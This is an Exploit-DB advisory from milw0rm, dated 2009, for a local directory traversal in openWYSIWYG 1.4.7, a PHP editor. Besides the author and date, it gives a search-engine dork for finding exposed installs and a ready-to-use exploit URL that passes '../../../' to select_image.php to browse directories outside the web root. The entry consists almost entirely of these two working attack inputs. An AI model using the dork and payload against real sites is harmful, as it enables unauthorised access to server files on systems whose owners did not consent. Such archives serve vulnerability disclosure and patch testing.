openWYSIWYG 1.4.7 - Local Directory Traversal

EDB-ID:

8654

CVE:



Author:

StAkeR

Type:

webapps


Platform:

PHP

Date:

2009-05-11


[--- openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability ---]

[-- Discovered by Juri Gianni aka yeat - staker[at]hotmail[dot]it --]
[-- Visit http://zeroidentity.org --]
[-- allinurl: addons/imagelibrary/select_image.php --]

http://[target]/[path]/addons/imagelibrary/select_image.php?dir=../../../

# milw0rm.com [2009-05-11]